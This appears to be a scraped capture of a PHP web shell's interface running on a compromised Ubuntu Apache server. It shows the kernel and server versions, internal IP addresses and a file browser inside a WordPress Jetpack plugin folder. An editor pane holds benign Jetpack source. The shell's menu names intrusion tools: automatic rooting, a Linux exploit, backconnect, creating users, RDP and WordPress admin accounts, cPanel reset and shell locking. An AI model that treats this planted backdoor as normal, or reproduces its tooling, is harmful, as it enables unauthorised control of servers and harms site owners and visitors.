Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cilab /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
CHANGELOG.md
650.24
KB
-rw-r--r--
LICENSE.txt
17.98
KB
-rw-r--r--
SECURITY.md
2.45
KB
-rw-r--r--
class-jetpack-connection-statu...
728
B
-rw-r--r--
class-jetpack-gallery-settings...
3.38
KB
-rw-r--r--
class-jetpack-pre-connection-j...
2.34
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
7.77
KB
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
8.33
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
20.13
KB
-rw-r--r--
class.jetpack-affiliate.php
205
B
-rw-r--r--
class.jetpack-autoupdate.php
9.74
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
220
B
-rw-r--r--
class.jetpack-cli.php
71.8
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.62
KB
-rw-r--r--
class.jetpack-gutenberg.php
42.38
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.55
KB
-rw-r--r--
class.jetpack-modules-list-tab...
14.79
KB
-rw-r--r--
class.jetpack-network-sites-li...
5.98
KB
-rw-r--r--
class.jetpack-network.php
21.05
KB
-rw-r--r--
class.jetpack-plan.php
4.09
KB
-rw-r--r--
class.jetpack-post-images.php
33.83
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
12.92
KB
-rw-r--r--
class.jetpack-user-agent.php
25.3
KB
-rw-r--r--
class.jetpack.php
211.39
KB
-rw-r--r--
class.json-api-endpoints.php
82.84
KB
-rw-r--r--
class.json-api.php
34.47
KB
-rw-r--r--
class.photon.php
1.74
KB
-rw-r--r--
composer.json
3.83
KB
-rw-r--r--
enhanced-open-graph.php
4.35
KB
-rw-r--r--
functions.compat.php
4.28
KB
-rw-r--r--
functions.cookies.php
2.04
KB
-rw-r--r--
functions.global.php
15.21
KB
-rw-r--r--
functions.is-mobile.php
2.47
KB
-rw-r--r--
functions.opengraph.php
21.38
KB
-rw-r--r--
functions.photon.php
3.04
KB
-rw-r--r--
global.d.ts
48
B
-rw-r--r--
jetpack.php
8.58
KB
-rw-r--r--
json-api-config.php
338
B
-rw-r--r--
json-endpoints.php
6.92
KB
-rw-r--r--
load-jetpack.php
3.1
KB
-rw-r--r--
locales.php
324
B
-rw-r--r--
readme.txt
30.83
KB
-rw-r--r--
uninstall.php
1.6
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.jetpack-network-sites-list-table.php
<?php // phpcs:ignore WordPress.Files.FileName.InvalidClassFileName /** * Jetpack network sites list table. * * @package automattic/jetpack */ if ( ! class_exists( 'WP_List_Table' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-list-table.php'; } /** * Jetpack network sites list table. */ class Jetpack_Network_Sites_List_Table extends WP_List_Table { /** * Get columns. * * @return array name => header HTML. */ public function get_columns() { // site name, status, username connected under. $columns = array( 'cb' => '<input type="checkbox" />', 'blogname' => __( 'Site Name', 'jetpack' ), 'blog_path' => __( 'Path', 'jetpack' ), 'connected' => __( 'Connected', 'jetpack' ), ); return $columns; } /** * Prepare items. */ public function prepare_items() { // Make sure Jetpack_Network is initialized. Jetpack_Network::init(); // Deal with bulk actions if any were requested by the user. $this->process_bulk_action(); $sites = get_sites( array( 'site__not_in' => array( get_current_blog_id() ), 'archived' => false, 'number' => 0, 'network_id' => get_current_network_id(), ) ); // Setup pagination. $per_page = 25; $current_page = $this->get_pagenum(); $total_items = is_countable( $sites ) ? count( $sites ) : 0; $sites = array_slice( $sites, ( ( $current_page - 1 ) * $per_page ), $per_page ); $this->set_pagination_args( array( 'total_items' => $total_items, 'per_page' => $per_page, ) ); $columns = $this->get_columns(); $hidden = array(); $sortable = array(); $this->_column_headers = array( $columns, $hidden, $sortable ); $this->items = $sites; } /** * Column blogname. * * @param object|array $item Item. * @return string HTML. */ public function column_blogname( $item ) { // <http://jpms/wp-admin/network/site-info.php?id=1>. switch_to_blog( $item->blog_id ); $jp_url = admin_url( 'admin.php?page=jetpack' ); restore_current_blog(); $actions = array( 'edit' => '<a href="' . esc_url( network_admin_url( 'site-info.php?id=' . $item->blog_id ) ) . '">' . esc_html__( 'Edit', 'jetpack' ) . '</a>', 'dashboard' => '<a href="' . esc_url( get_admin_url( $item->blog_id, '', 'admin' ) ) . '">' . esc_html__( 'Dashboard', 'jetpack' ) . '</a>', 'view' => '<a href="' . esc_url( get_site_url( $item->blog_id, '', 'admin' ) ) . '">' . esc_html__( 'View', 'jetpack' ) . '</a>', 'jetpack-' . $item->blog_id => '<a href="' . esc_url( $jp_url ) . '">Jetpack</a>', ); return sprintf( '%1$s %2$s', '<strong>' . get_blog_option( $item->blog_id, 'blogname' ) . '</strong>', $this->row_actions( $actions ) ); } /** * Column blog path. * * @param object|array $item Item. * @return string HTML. */ public function column_blog_path( $item ) { return '<a href="' . get_site_url( $item->blog_id, '', 'admin' ) . '">' . str_replace( array( 'http://', 'https://' ), '', get_site_url( $item->blog_id, '', 'admin' ) ) . '</a>'; } /** * Column connected. * * @param object|array $item Item. * @return string HTML. */ public function column_connected( $item ) { $jpms = Jetpack_Network::init(); $jp = Jetpack::init(); switch_to_blog( $item->blog_id ); // Checks for both the stock version of Jetpack and the one managed by the Jetpack Beta Plugin. if ( ! is_plugin_active( 'jetpack/jetpack.php' ) && ! is_plugin_active( 'jetpack-dev/jetpack.php' ) && ! array_key_exists( 'jetpack.php', get_mu_plugins() ) ) { $title = __( 'Jetpack is not active on this site.', 'jetpack' ); $action = array( 'manage-plugins' => '<a href="' . get_admin_url( $item->blog_id, 'plugins.php', 'admin' ) . '">' . __( 'Manage Plugins', 'jetpack' ) . '</a>', ); restore_current_blog(); return sprintf( '%1$s %2$s', $title, $this->row_actions( $action ) ); } if ( $jp->is_connection_ready() ) { // Build url for disconnecting. $url = $jpms->get_url( array( 'name' => 'subsitedisconnect', 'site_id' => $item->blog_id, ) ); restore_current_blog(); return '<a href="' . wp_nonce_url( $url, 'jetpack-subsite-disconnect' ) . '">' . esc_html__( 'Disconnect', 'jetpack' ) . '</a>'; } restore_current_blog(); // Build URL for connecting. $url = $jpms->get_url( array( 'name' => 'subsiteregister', 'site_id' => $item->blog_id, ) ); return '<a href="' . wp_nonce_url( $url, 'jetpack-subsite-register' ) . '">' . esc_html__( 'Connect', 'jetpack' ) . '</a>'; } /** * Get bulk actions. * * @return array Code => HTML. */ public function get_bulk_actions() { $actions = array( 'connect' => esc_html__( 'Connect', 'jetpack' ), 'disconnect' => esc_html__( 'Disconnect', 'jetpack' ), ); return $actions; } /** * Column checkbox. * * @param object|array $item Item. * @return string HTML. */ public function column_cb( $item ) { return sprintf( '<input type="checkbox" name="bulk[]" value="%s" />', $item->blog_id ); } /** * Process bulk actions. */ public function process_bulk_action() { // phpcs:ignore WordPress.Security.NonceVerification.Missing -- Check if we have anything to do before checking the nonce. if ( empty( $_POST['bulk'] ) ) { return; // Thou shall not pass! There is nothing to do. } check_admin_referer( 'bulk-toplevel_page_jetpack-network' ); $jpms = Jetpack_Network::init(); $action = $this->current_action(); switch ( $action ) { case 'connect': $bulk = wp_unslash( $_POST['bulk'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized foreach ( $bulk as $site ) { $jpms->do_subsiteregister( $site ); } break; case 'disconnect': $bulk = wp_unslash( $_POST['bulk'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized foreach ( $bulk as $site ) { $jpms->do_subsitedisconnect( $site ); } break; } } } // end h
Close